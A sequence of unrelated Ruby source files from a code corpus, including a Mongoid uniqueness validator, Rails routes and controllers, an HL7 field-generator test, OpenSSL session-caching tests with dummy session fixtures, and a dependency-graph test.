#
# @return [ Object, Regexp ] The value, filtered or not.
#
# @since 2.3.0
def filter(value)
!case_sensitive? && value ? /\A#{Regexp.escape(value.to_s)}$/i : value
end
# Scope the criteria to the scope options provided.
#
# @api private
#
# @example Scope the criteria.
# validator.scope(criteria, document)
#
# @param [ Criteria ] criteria The criteria to scope.
# @param [ Document ] document The document being validated.
#
# @return [ Criteria ] The scoped criteria.
#
# @since 2.3.0
def scope(criteria, document, _attribute)
Array.wrap(options[:scope]).each do |item|
name = document.database_field_name(item)
criteria = criteria.where(item => document.attributes[name])
end
criteria
end
# Should validation be skipped?
#
# @api private
#
# @example Should the validation be skipped?
# validator.skip_validation?(doc)
#
# @param [ Document ] document The embedded document.
#
# @return [ true, false ] If the validation should be skipped.
#
# @since 2.3.0
def skip_validation?(document)
!document._parent || document.embedded_one?
end
# Scope reference has changed?
#
# @api private
#
# @example Has scope reference changed?
# validator.scope_value_changed?(doc)
#
# @param [ Document ] document The embedded document.
#
# @return [ true, false ] If the scope reference has changed.
#
# @since
def scope_value_changed?(document)
Array.wrap(options[:scope]).any? do |item|
document.send("attribute_changed?", item.to_s)
end
end
# Get the name of the field and the value to validate. This is for the
# case when we validate a relation via the relation name and not the key,
# we need to send the key name and value to the db, not the relation
# object.
#
# @api private
#
# @example Get the name and key to validate.
# validator.to_validate(doc, :parent, Parent.new)
#
# @param [ Document ] document The doc getting validated.
# @param [ Symbol ] attribute The attribute getting validated.
# @param [ Object ] value The value of the attribute.
#
# @return [ Array<Object, Object> ] The field and value.
#
# @since 2.4.4
def to_validate(document, attribute, value)
association = document.relations[attribute.to_s]
if association && association.stores_foreign_key?
[ association.foreign_key, value && value._id ]
else
[ attribute, value ]
end
end
# Validate an embedded document.
#
# @api private
#
# @example Validate the embedded document.
# validator.validate_embedded(doc, :name, "test")
#
# @param [ Document ] document The document.
# @param [ Symbol ] attribute The attribute name.
# @param [ Object ] value The value.
#
# @since 2.4.10
def validate_embedded(document, attribute, value)
return if skip_validation?(document)
relation = document._parent.send(document.association_name)
criteria = create_criteria(relation, document, attribute, value)
criteria = criteria.merge(options[:conditions].call) if options[:conditions]
add_error(document, attribute, value) if criteria.count > 1
end
# Validate a root document.
#
# @api private
#
# @example Validate the root document.
# validator.validate_root(doc, :name, "test")
#
# @param [ Document ] document The document.
# @param [ Symbol ] attribute The attribute name.
# @param [ Object ] value The value.
#
# @since 2.4.10
def validate_root(document, attribute, value)
klass = document.class
while klass.superclass.respond_to?(:validators) && klass.superclass.validators.include?(self)
klass = klass.superclass
end
criteria = create_criteria(klass, document, attribute, value)
criteria = criteria.merge(options[:conditions].call) if options[:conditions]
if criteria.read(mode: :primary).exists?
add_error(document, attribute, value)
end
end
# Are we required to validate the document?
#
# @example Is validation needed?
# validator.validation_required?(doc, :field)
#
# @param [ Document ] document The document getting validated.
# @param [ Symbol ] attribute The attribute to validate.
#
# @return [ true, false ] If we need to validate.
#
# @since 2.4.4
def validation_required?(document, attribute)
document.new_record? ||
document.send("attribute_changed?", attribute.to_s) ||
scope_value_changed?(document)
end
# Is the attribute localized?
#
# @api private
#
# @example Is the attribute localized?
# validator.localized?(doc, :field)
#
# @param [ Document ] document The document getting validated.
# @param [ Symbol ] attribute The attribute to validate.
#
# @return [ true, false ] If the attribute is localized.
#
# @since 4.0.0
def localized?(document, attribute)
document.fields[document.database_field_name(attribute)].try(:localized?)
end
end
end
end
| 31.933962 | 103 | 0.593895 |
280036f9057beecc97706606d1288e7bf63756a4 | 263 | Rails.application.routes.draw do
resources :todos
get 'hello_world', to: 'hello_world#index'
put '/todos', to: 'todos#massUpdate'
root 'todos#index'
# For details on the DSL available within this file, see http://guides.rubyonrails.org/routing.html
end
| 32.875 | 101 | 0.741445 |
6a6a109dbbe8386cd230301fa0ff5b294f78d7b6 | 1,230 | class ExercisesController < ApplicationController
before_action :set_exercise, only: [:show, :update, :destroy]
# GET /exercises
def index
@exercises = Exercise.all
render json: ExerciseSerializer.new(@exercises).serializable_hash[:data].map{|hash| hash[:attributes] }
end
# GET /exercises/1
def show
render json: @exercise
end
# POST /exercises
def create
@exercise = Exercise.new(exercise_params)
if @exercise.save
render json: @exercise, status: :created, location: @exercise
else
render json: @exercise.errors, status: :unprocessable_entity
end
end
# PATCH/PUT /exercises/1
def update
if @exercise.update(exercise_params)
render json: @exercise
else
render json: @exercise.errors, status: :unprocessable_entity
end
end
# DELETE /exercises/1
def destroy
@exercise.destroy
end
private
# Use callbacks to share common setup or constraints between actions.
def set_exercise
@exercise = Exercise.find(params[:id])
end
# Only allow a trusted parameter "white list" through.
def exercise_params
params.require(:exercise).permit(:name, :category, :target, :user_id, :workout_id)
end
end
| 23.653846 | 107 | 0.692683 |
e9971a0d18dd0e81f4f63828335ce2c69abc531e | 8,949 | require 'test/unit'
require 'ox'
require 'set'
require_relative '../../lib/ez7gen/service/2.5/field_generator'
class FieldGenerator25Test < Test::Unit::TestCase
# 27
vs =
[
# {:std=>"2.4", :path=>"../../test/test-config/schema/2.4", :profiles=>[{:doc=>"2.4.HL7", :name=>"2.4", :std=>"1", :path=>"../test/test-config/schema/2.4/2.4.HL7.xml"}, {:doc=>"VAZ2.4.HL7", :name=>"VAZ2.4", :description=>"2.4 schema with VA defined tables and Z segments", :base=>"2.4", :path=>"../test/test-config/schema/2.4/VAZ2.4.HL7.xml.bkp"}]},
{:std=>"2.5", :path=>"../../test/test-config/schema/2.5", :profiles=>[{:doc=>"2.5.HL7", :name=>"2.5", :std=>"1", :path=>"../../test/test-config/schema/2.5/2.5.HL7.xml"}, {:doc=>"TEST2.5.HL7", :name=>"TEST2.5", :description=>"2.5 mockup schema for testing", :base=>"2.5", :path=>"../../test/test-config/schema/2.5/VAZ2.5.HL7.xml"}]}
]
# attrs = {std: '2.4', version: '2.4.HL7', event: 'ADT_A01', version_store: vs}
attrs = {std: '2.5', version: '2.5.HL7', event: 'ADT_A01', version_store: vs}
#parse xml once
@@pp = ProfileParser.new(attrs)
#helper method
def lineToHash(line)
hash = line.gsub(/(\[|\])/,'').gsub(':',',').split(',').map{|it| it.strip()}.each_slice(2).to_a.to_h
return Hash[hash.map{|(k,v)| [k.to_sym,v]}]
end
def setup
@fldGenerator = FieldGenerator.new(@@pp)
end
def teardown
@fieldGenerator = nil
end
def test_init
assert_equal 'Odysseus', @fldGenerator.yml['person.names.first'][0]
end
def test_base_types
dt = @fldGenerator.DT({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.FT({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.ID({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.IS({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.NM({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.SI({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.ST({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TM({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TN({},true)
p dt
assert_not_nil dt
dt = @fldGenerator.TX({},true)
p dt
assert_not_nil dt
end
def test_property_types
dt = @fldGenerator.FN({},true)
p dt
assert_not_nil dt
end
# <DataType name='FN' description='familiy name'>
# <DataSubType piece='1' description='surname' datatype='ST' />
# <DataSubType piece='2' description='own surname prefix' datatype='ST' />
# <DataSubType piece='3' description='own surname' datatype='ST' />
# <DataSubType piece='4' description='surname prefix from partner/spouse' datatype='ST' />
# <DataSubType piece='5' description='surname from partner/spouse' datatype='ST' />
# </DataType>
def test_dynamic_SN
#2.4
# <DataType name='SN' description='structured numeric'>
# <DataSubType piece='1' description='comparator'datatype='ST' />
# <DataSubType piece='2' description='num1' datatype='NM' />
# <DataSubType piece='3' description='separator/suffix' datatype='ST' />
# <DataSubType piece='4' description='num2' datatype='NM' />
# </DataType>
#2.5
# <DataType name='SN' description='Structured Numeric'>
# <DataSubType piece='1' description='Comparator' datatype='ST' max_length='2' required='O'/>
# <DataSubType piece='2' description='Num1' datatype='NM' max_length='15' required='O'/>
# <DataSubType piece='3' description='Separator/Suffix' datatype='ST' max_length='1' required='O'/>
# <DataSubType piece='4' description='Num2' datatype='NM' max_length='15' required='O'/>
# </DataType>
dt = @fldGenerator.dt('SN',{:required => 'R'})
p dt
assert_equal 3, dt.count('^')
end
def test_dynamic_CE
# <DataType name='CE' description='coded element'>
# <DataSubType piece='1' description='identifier (ST)' datatype='ST' />
# <DataSubType piece='2' description='text' datatype='ST' />
# <DataSubType piece='3' description='name of coding system' datatype='IS' codetable='396' />
# <DataSubType piece='4' description='alternate identifier (ST)' datatype='ST' />
# <DataSubType piece='5' description='alternate text' datatype='ST' />
# <DataSubType piece='6' description='name of alternate coding system' datatype='IS' codetable='396' />
# </DataType>
dt = @fldGenerator.dt('CE',{:required => 'R'})
p dt
# assert_equal 5, dt.count('^')
assert_equal 0, dt.count('^')
end
def test_dynamic_XPN
# <DataType name='XPN' description='Extended Person Name'>
# <DataSubType piece='1' description='Family Name' datatype='FN' max_length='194' required='O'/>
# <DataSubType piece='2' description='Given Name' datatype='ST' max_length='30' required='O'/>
# <DataSubType piece='3' description='Second and Further Given Names or Initials Thereof' datatype='ST' max_length='30' required='O'/>
# <DataSubType piece='4' description='Suffix (e.g., JR or III)' datatype='ST' max_length='20' required='O'/>
# <DataSubType piece='5' description='Prefix (e.g., DR)' datatype='ST' max_length='20' required='O'/>
# <DataSubType piece='6' description='Degree (e.g., MD)' datatype='IS' codetable='360' max_length='6' required='B'/>
# <DataSubType piece='7' description='Name Type Code' datatype='ID' codetable='200' max_length='1' required='O'/>
# <DataSubType piece='8' description='Name Representation Code' datatype='ID' codetable='465' max_length='1' required='O'/>
# <DataSubType piece='9' description='Name Context' datatype='CE' codetable='448' max_length='483' required='O'/>
# <DataSubType piece='10' description='Name Validity Range' datatype='DR' max_length='53' required='B'/>
# <DataSubType piece='11' description='Name Assembly Order' datatype='ID' codetable='444' max_length='1' required='O'/>
# <DataSubType piece='12' description='Effective Date' datatype='TS' max_length='26' required='O'/>
# <DataSubType piece='13' description='Expiration Date' datatype='TS' max_length='26' required='O'/>
# <DataSubType piece='14' description='Professional Suffix' datatype='ST' max_length='199' required='O'/>
# </DataType>
dt = @fldGenerator.dt('XPN',{:required => 'R'})
p dt
end
def test_dynamic_AD
# <DataType name='AD' description='Address'>
# <DataSubType piece='1' description='Street Address' max_length='120' required='O'/>
# <DataSubType piece='2' description='Other Designation' datatype='ST' max_length='120' required='O'/>
# <DataSubType piece='3' description='City' datatype='ST' max_length='50' required='O'/>
# <DataSubType piece='4' description='State or Province' datatype='ST' max_length='50' required='O'/>
# <DataSubType piece='5' description='Zip or Postal Code' datatype='ST' max_length='12' required='O'/>
# <DataSubType piece='6' description='Country' datatype='ID' codetable='399' max_length='3' required='O'/>
# <DataSubType piece='7' description='Address Type' datatype='ID' codetable='190' max_length='3' required='O'/>
# <DataSubType piece='8' description='Other Geographic Designation' datatype='ST' max_length='50' required='O'/>
# </DataType>
dt = @fldGenerator.dt('AD',{:required => 'R'})
p dt
end
def test_TS
p @fldGenerator.dt('TS',{:required => 'R', :max_length=> 50})
end
def test_HD
# <DataType name='HD' description='Hierarchic Designator'>
# <DataSubType piece='1' description='Namespace ID' datatype='IS' codetable='300' max_length='20' required='O'/>
# <DataSubType piece='2' description='Universal ID' datatype='ST' max_length='199' required='C'/>
# <DataSubType piece='3' description='Universal ID Type' datatype='ID' codetable='301' max_length='6' required='C'/>
# </DataType>
p @fldGenerator.dt('HD',{:required => 'R'})
end
def test_ED
# <DataType name='ED' description='Encapsulated Data'>
# <DataSubType piece='1' description='Source Application' datatype='HD' max_length='227' required='O'/>
# <DataSubType piece='2' description='Type of Data' datatype='ID' codetable='191' max_length='9' required='R'/>
# <DataSubType piece='3' description='Data Subtype' datatype='ID' codetable='291' max_length='18' required='O'/>
# <DataSubType piece='4' description='Encoding' datatype='ID' codetable='299' max_length='6' required='R'/>
# <DataSubType piece='5' description='Data' datatype='TX' required='R'/>
# </DataType>
p @fldGenerator.dt('ED',{:required => 'R'})
end
def test_all
all = []
path = File.path('../../test/test-config/schema/2.5/2.5.HL7.xml')
xml = Ox.parse(IO.read(path))
assert_not_nil (xml)
data_types = []
dts = xml.Export.Document.Category.locate('DataType')
dts.each{ |it|
name =it.attributes[:name]
all << name
# p "DataType: #{name}"
dt = @fldGenerator.dt(name,{:required => 'R'})
p "DataType #{name} :" + dt
}
p all
p all.size
end
end | 41.050459 | 359 | 0.649123 |
f89732ab6c0006cdea4a6bc878d919503c30d058 | 13,088 | # frozen_string_literal: false
require_relative "utils"
class OpenSSL::TestSSLSession < OpenSSL::SSLTestCase
def test_session_equals
session = OpenSSL::SSL::Session.new <<-SESSION
-----BEGIN SSL SESSION PARAMETERS-----
MIIDFgIBAQICAwEEAgA5BCCY3pW6iTkPoD5SENuztz/gZjhvey6XnHbsxd22k0Ol
dgQw8uaN3hCRnlhoIKPWInCFzrp/tQsDRFs9jDjc9pwpy/oKHmJdQQMQA1g8FYnO
gpdVoQYCBE52ikKiBAICASyjggKOMIICijCCAXKgAwIBAgIBAjANBgkqhkiG9w0B
AQUFADA9MRMwEQYKCZImiZPyLGQBGRYDb3JnMRkwFwYKCZImiZPyLGQBGRYJcnVi
eS1sYW5nMQswCQYDVQQDDAJDQTAeFw0xMTA5MTkwMDE4MTBaFw0xMTA5MTkwMDQ4
MTBaMEQxEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAy8LEsNRApz7U/j5DoB4XBgO9Z8Atv5y/OVQRp0ag8Tqo1YewsWijxEWB
7JOATwpBN267U4T1nPZIxxEEO7n/WNa2ws9JWsjah8ssEBFSxZqdXKSLf0N4Hi7/
GQ/aYoaMCiQ8jA4jegK2FJmXM71uPe+jFN/peeBOpRfyXxRFOYcCAwEAAaMSMBAw
DgYDVR0PAQH/BAQDAgWgMA0GCSqGSIb3DQEBBQUAA4IBAQARC7GP7InX1t7VEXz2
I8RI57S0/HSJL4fDIYP3zFpitHX1PZeo+7XuzMilvPjjBo/ky9Jzo8TYiY+N+JEz
mY/A/zPA4ZsJ7KYj6/FEdIc/vRlS0CvsbClbNjw1jl/PoB2FLr2b3uuBcZEsyZeP
yq154ijq37Ajf8K5Mi5FgshoP41BPtRPj+VVf61rv1IcEnNWdDCS6DR4XsaNC+zt
G6AqCqkytIXWRuDw6n6vYLF3A/tn2sldLo7/scY0PMDNbo63O/LTxkDHmPhSkD68
8m9SsMeTR+RCiDEZWFPVcAH/8mDfi+5k8uN3qS+gOU/PPrmHGgl5ykiSFgqs4v61
tddwpBAEDjcwMzA5NTYzMTU1MzAwpQMCARM=
-----END SSL SESSION PARAMETERS-----
SESSION
start_server(ignore_listener_error: true) { |_, port|
ctx = OpenSSL::SSL::SSLContext.new
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT
ctx.session_id_context = self.object_id.to_s
sock = TCPSocket.new '127.0.0.1', port
begin
ssl = OpenSSL::SSL::SSLSocket.new sock, ctx
ssl.session = session
assert_equal session, ssl.session
ensure
sock.close
end
}
end
def test_session
Timeout.timeout(5) do
start_server do |server, port|
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.connect
session = ssl.session
assert(session == OpenSSL::SSL::Session.new(session.to_pem))
assert(session == OpenSSL::SSL::Session.new(ssl))
session.timeout = 5
assert_equal(5, session.timeout)
assert_not_nil(session.time)
# SSL_SESSION_time keeps long value so we can't keep nsec fragment.
session.time = t1 = Time.now.to_i
assert_equal(Time.at(t1), session.time)
assert_not_nil(session.id)
pem = session.to_pem
assert_match(/\A-----BEGIN SSL SESSION PARAMETERS-----/, pem)
assert_match(/-----END SSL SESSION PARAMETERS-----\Z/, pem)
pem.gsub!(/-----(BEGIN|END) SSL SESSION PARAMETERS-----/, '').gsub!(/[\r\n]+/m, '')
assert_equal(session.to_der, pem.unpack('m*')[0])
assert_not_nil(session.to_text)
ssl.close
end
end
end
DUMMY_SESSION = <<__EOS__
-----BEGIN SSL SESSION PARAMETERS-----
MIIDzQIBAQICAwEEAgA5BCAF219w9ZEV8dNA60cpEGOI34hJtIFbf3bkfzSgMyad
MQQwyGLbkCxE4OiMLdKKem+pyh8V7ifoP7tCxhdmwoDlJxI1v6nVCjai+FGYuncy
NNSWoQYCBE4DDWuiAwIBCqOCAo4wggKKMIIBcqADAgECAgECMA0GCSqGSIb3DQEB
BQUAMD0xEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxCzAJBgNVBAMMAkNBMB4XDTExMDYyMzA5NTQ1MVoXDTExMDYyMzEwMjQ1
MVowRDETMBEGCgmSJomT8ixkARkWA29yZzEZMBcGCgmSJomT8ixkARkWCXJ1Ynkt
bGFuZzESMBAGA1UEAwwJbG9jYWxob3N0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCB
iQKBgQDLwsSw1ECnPtT+PkOgHhcGA71nwC2/nL85VBGnRqDxOqjVh7CxaKPERYHs
k4BPCkE3brtThPWc9kjHEQQ7uf9Y1rbCz0layNqHyywQEVLFmp1cpIt/Q3geLv8Z
D9pihowKJDyMDiN6ArYUmZczvW4976MU3+l54E6lF/JfFEU5hwIDAQABoxIwEDAO
BgNVHQ8BAf8EBAMCBaAwDQYJKoZIhvcNAQEFBQADggEBACj5WhoZ/ODVeHpwgq1d
8fW/13ICRYHYpv6dzlWihyqclGxbKMlMnaVCPz+4JaVtMz3QB748KJQgL3Llg3R1
ek+f+n1MBCMfFFsQXJ2gtLB84zD6UCz8aaCWN5/czJCd7xMz7fRLy3TOIW5boXAU
zIa8EODk+477K1uznHm286ab0Clv+9d304hwmBZgkzLg6+31Of6d6s0E0rwLGiS2
sOWYg34Y3r4j8BS9Ak4jzpoLY6cJ0QAKCOJCgmjGr4XHpyXMLbicp3ga1uSbwtVO
gF/gTfpLhJC+y0EQ5x3Ftl88Cq7ZJuLBDMo/TLIfReJMQu/HlrTT7+LwtneSWGmr
KkSkAgQApQMCAROqgcMEgcAuDkAVfj6QAJMz9yqTzW5wPFyty7CxUEcwKjUqj5UP
/Yvky1EkRuM/eQfN7ucY+MUvMqv+R8ZSkHPsnjkBN5ChvZXjrUSZKFVjR4eFVz2V
jismLEJvIFhQh6pqTroRrOjMfTaM5Lwoytr2FTGobN9rnjIRsXeFQW1HLFbXn7Dh
8uaQkMwIVVSGRB8T7t6z6WIdWruOjCZ6G5ASI5XoqAHwGezhLodZuvJEfsVyCF9y
j+RBGfCFrrQbBdnkFI/ztgM=
-----END SSL SESSION PARAMETERS-----
__EOS__
DUMMY_SESSION_NO_EXT = <<-__EOS__
-----BEGIN SSL SESSION PARAMETERS-----
MIIDCAIBAQICAwAEAgA5BCDyAW7rcpzMjDSosH+Tv6sukymeqgq3xQVVMez628A+
lAQw9TrKzrIqlHEh6ltuQaqv/Aq83AmaAlogYktZgXAjOGnhX7ifJDNLMuCfQq53
hPAaoQYCBE4iDeeiBAICASyjggKOMIICijCCAXKgAwIBAgIBAjANBgkqhkiG9w0B
AQUFADA9MRMwEQYKCZImiZPyLGQBGRYDb3JnMRkwFwYKCZImiZPyLGQBGRYJcnVi
eS1sYW5nMQswCQYDVQQDDAJDQTAeFw0xMTA3MTYyMjE3MTFaFw0xMTA3MTYyMjQ3
MTFaMEQxEzARBgoJkiaJk/IsZAEZFgNvcmcxGTAXBgoJkiaJk/IsZAEZFglydWJ5
LWxhbmcxEjAQBgNVBAMMCWxvY2FsaG9zdDCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAy8LEsNRApz7U/j5DoB4XBgO9Z8Atv5y/OVQRp0ag8Tqo1YewsWijxEWB
7JOATwpBN267U4T1nPZIxxEEO7n/WNa2ws9JWsjah8ssEBFSxZqdXKSLf0N4Hi7/
GQ/aYoaMCiQ8jA4jegK2FJmXM71uPe+jFN/peeBOpRfyXxRFOYcCAwEAAaMSMBAw
DgYDVR0PAQH/BAQDAgWgMA0GCSqGSIb3DQEBBQUAA4IBAQA3TRzABRG3kz8jEEYr
tDQqXgsxwTsLhTT5d1yF0D8uFw+y15hJAJnh6GJHjqhWBrF4zNoTApFo+4iIL6g3
q9C3mUsxIVAHx41DwZBh/FI7J4FqlAoGOguu7892CNVY3ZZjc3AXMTdKjcNoWPzz
FCdj5fNT24JMMe+ZdGZK97ChahJsdn/6B3j6ze9NK9mfYEbiJhejGTPLOFVHJCGR
KYYZ3ZcKhLDr9ql4d7cCo1gBtemrmFQGPui7GttNEqmXqUKvV8mYoa8farf5i7T4
L6a/gp2cVZTaDIS1HjbJsA/Ag7AajZqiN6LfqShNUVsrMZ+5CoV8EkBDTZPJ9MSr
a3EqpAIEAKUDAgET
-----END SSL SESSION PARAMETERS-----
__EOS__
def test_session_time
sess = OpenSSL::SSL::Session.new(DUMMY_SESSION_NO_EXT)
sess.time = (now = Time.now)
assert_equal(now.to_i, sess.time.to_i)
sess.time = 1
assert_equal(1, sess.time.to_i)
sess.time = 1.2345
assert_equal(1, sess.time.to_i)
# Can OpenSSL handle t>2038y correctly? Version?
sess.time = 2**31 - 1
assert_equal(2**31 - 1, sess.time.to_i)
end
def test_session_timeout
sess = OpenSSL::SSL::Session.new(DUMMY_SESSION_NO_EXT)
assert_raise(TypeError) do
sess.timeout = Time.now
end
sess.timeout = 1
assert_equal(1, sess.timeout.to_i)
sess.timeout = 1.2345
assert_equal(1, sess.timeout.to_i)
sess.timeout = 2**31 - 1
assert_equal(2**31 - 1, sess.timeout.to_i)
end
def test_session_exts_read
assert(OpenSSL::SSL::Session.new(DUMMY_SESSION))
end
def test_client_session
last_session = nil
start_server do |server, port|
2.times do
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.session = last_session if last_session
ssl.connect
session = ssl.session
if last_session
assert(ssl.session_reused?)
assert_equal(session.id, last_session.id)
assert_equal(session.to_pem, last_session.to_pem)
assert_equal(session.to_der, last_session.to_der)
# Older version of OpenSSL may not be consistent. Look up which versions later.
assert_equal(session.to_text, last_session.to_text)
else
assert(!ssl.session_reused?)
end
last_session = session
str = "x" * 100 + "\n"
ssl.puts(str)
assert_equal(str, ssl.gets)
ssl.close
end
end
end
def test_server_session
connections = 0
saved_session = nil
ctx_proc = Proc.new do |ctx, ssl|
# add test for session callbacks here
end
server_proc = Proc.new do |ctx, ssl|
session = ssl.session
stats = ctx.session_cache_stats
case connections
when 0
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 0)
assert_equal(stats[:cache_misses], 0)
assert(!ssl.session_reused?)
when 1
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 1)
assert_equal(stats[:cache_misses], 0)
assert(ssl.session_reused?)
ctx.session_remove(session)
saved_session = session.to_der
when 2
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 1)
assert_equal(stats[:cache_misses], 1)
assert(!ssl.session_reused?)
ctx.session_add(OpenSSL::SSL::Session.new(saved_session))
when 3
assert_equal(stats[:cache_num], 2)
assert_equal(stats[:cache_hits], 2)
assert_equal(stats[:cache_misses], 1)
assert(ssl.session_reused?)
ctx.flush_sessions(Time.now + 10000)
when 4
assert_equal(stats[:cache_num], 1)
assert_equal(stats[:cache_hits], 2)
assert_equal(stats[:cache_misses], 2)
assert(!ssl.session_reused?)
ctx.session_add(OpenSSL::SSL::Session.new(saved_session))
end
connections += 1
readwrite_loop(ctx, ssl)
end
first_session = nil
start_server(ctx_proc: ctx_proc, server_proc: server_proc) do |server, port|
10.times do |i|
sock = TCPSocket.new("127.0.0.1", port)
ctx = OpenSSL::SSL::SSLContext.new
# disable RFC4507 support
ctx.options = OpenSSL::SSL::OP_NO_TICKET
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.session = first_session if first_session
ssl.connect
session = ssl.session
if first_session
case i
when 1; assert(ssl.session_reused?)
when 2; assert(!ssl.session_reused?)
when 3; assert(ssl.session_reused?)
when 4; assert(!ssl.session_reused?)
when 5..10; assert(ssl.session_reused?)
end
end
first_session ||= session
str = "x" * 100 + "\n"
ssl.puts(str)
assert_equal(str, ssl.gets)
ssl.close
end
end
end
def test_ctx_client_session_cb
called = {}
ctx = OpenSSL::SSL::SSLContext.new
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_CLIENT
ctx.session_new_cb = lambda { |ary|
sock, sess = ary
called[:new] = [sock, sess]
}
ctx.session_remove_cb = lambda { |ary|
ctx, sess = ary
called[:remove] = [ctx, sess]
# any resulting value is OK (ignored)
}
start_server do |server, port|
sock = TCPSocket.new("127.0.0.1", port)
begin
ssl = OpenSSL::SSL::SSLSocket.new(sock, ctx)
ssl.sync_close = true
ssl.connect
assert_equal(1, ctx.session_cache_stats[:cache_num])
assert_equal(1, ctx.session_cache_stats[:connect_good])
assert_equal([ssl, ssl.session], called[:new])
assert(ctx.session_remove(ssl.session))
assert(!ctx.session_remove(ssl.session))
assert_equal([ctx, ssl.session], called[:remove])
ssl.close
ensure
sock.close if !sock.closed?
end
end
end
def test_ctx_server_session_cb
called = {}
ctx_proc = Proc.new { |ctx, ssl|
ctx.session_cache_mode = OpenSSL::SSL::SSLContext::SESSION_CACHE_SERVER
ctx.options = OpenSSL::SSL::OP_NO_TICKET
last_server_session = nil
# get_cb is called whenever a client proposed to resume a session but
# the session could not be found in the internal session cache.
ctx.session_get_cb = lambda { |ary|
sess, data = ary
if last_server_session
called[:get2] = [sess, data]
last_server_session
else
called[:get1] = [sess, data]
last_server_session = sess
nil
end
}
ctx.session_new_cb = lambda { |ary|
sock, sess = ary
called[:new] = [sock, sess]
# SSL server doesn't cache sessions so get_cb is called next time.
ctx.session_remove(sess)
}
ctx.session_remove_cb = lambda { |ary|
ctx, sess = ary
called[:remove] = [ctx, sess]
}
}
server_proc = Proc.new { |c, ssl|
ssl.session
c.session_cache_stats
readwrite_loop(c, ssl)
}
start_server(ctx_proc: ctx_proc, server_proc: server_proc) do |server, port|
last_client_session = nil
3.times do
sock = TCPSocket.new("127.0.0.1", port)
begin
ssl = OpenSSL::SSL::SSLSocket.new(sock, OpenSSL::SSL::SSLContext.new())
ssl.sync_close = true
ssl.session = last_client_session if last_client_session
ssl.connect
last_client_session = ssl.session
ssl.close
Timeout.timeout(5) do
Thread.pass until called.key?(:new)
assert(called.delete(:new))
Thread.pass until called.key?(:remove)
assert(called.delete(:remove))
end
ensure
sock.close if !sock.closed?
end
end
end
assert(called[:get1])
assert(called[:get2])
end
def test_dup
sess_orig = OpenSSL::SSL::Session.new(DUMMY_SESSION)
sess_dup = sess_orig.dup
assert_equal(sess_orig.to_der, sess_dup.to_der)
end
end
| 34.901333 | 91 | 0.709658 |
268f3b717170ea5124bff77fdb45b42e43490b52 | 624 | # frozen_string_literal: true
module QA
module Page
module Trials
class New < Chemlab::Page
path '/-/trials/new'
# TODO: Supplant with data-qa-selectors
text_field :first_name, id: 'first_name'
text_field :last_name, id: 'last_name'
text_field :company_name, id: 'company_name'
select :number_of_employees, id: 'company_size'
text_field :telephone_number, id: 'phone_number'
text_field :number_of_users, id: 'number_of_users'
select :country, id: 'country_select'
button :continue, value: 'Continue'
end
end
end
end
| 26 | 58 | 0.649038 |
39dfcd94ee0dfb28770ed687886b99a140b3d4f4 | 1,585 | require 'dbcode/graph'
require 'dbcode/sql_file'
describe DBCode::Graph do
def file_double(methods)
double DBCode::SQLFile, methods
end
it 'sorts two interdependent files' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: [], to_sql: 'file 2'
expect(described_class.new([file_1,file_2]).compile).to eq "file 2;\nfile 1"
end
it 'resolves a triangle' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: [], to_sql: 'file 2'
file_3 = file_double name: 'file_3', dependency_names: ['file_2'], to_sql: 'file 3'
expect(described_class.new([file_1,file_2,file_3]).compile).to eq "file 2;\nfile 1;\nfile 3"
end
it 'resolves a chain of three' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
file_2 = file_double name: 'file_2', dependency_names: ['file_3'], to_sql: 'file 2'
file_3 = file_double name: 'file_3', dependency_names: [], to_sql: 'file 3'
expect(described_class.new([file_1,file_2,file_3]).compile).to eq "file 3;\nfile 2;\nfile 1"
end
it 'raises when a file is missing' do
file_1 = file_double name: 'file_1', dependency_names: ['file_2'], to_sql: 'file 1'
expect do
described_class.new([file_1]).compile
end.to raise_error DBCode::LoadError, 'cannot load file -- file_2'
end
it 'is empty when empty' do
expect(described_class.new({}).to_sql).to eq ''
end
end
| 39.625 | 96 | 0.692114 |
f8345eff4d221eb9c7bcf53f16202e21ad8196d9 | 431 | class MoveTrixEditorValueFromTangibleThingsToActionText < ActiveRecord::Migration[6.1]
def change
Scaffolding::CompletelyConcrete::TangibleThing.find_each do |tangible_thing|
if tangible_thing.trix_editor_value.present?
tangible_thing.update(action_text_value: tangible_thing.trix_editor_value)
end
end
remove_column :scaffolding_completely_concrete_tangible_things, :trix_editor_value
end
end
| 35.916667 | 86 | 0.812065 |
ed6786486fc53319b9e14bc5e47b7793c482bf54 | 3,434 | # rubocop:disable Lint/MissingCopEnableDirective, Metrics/BlockLength
Rails.application.routes.draw do
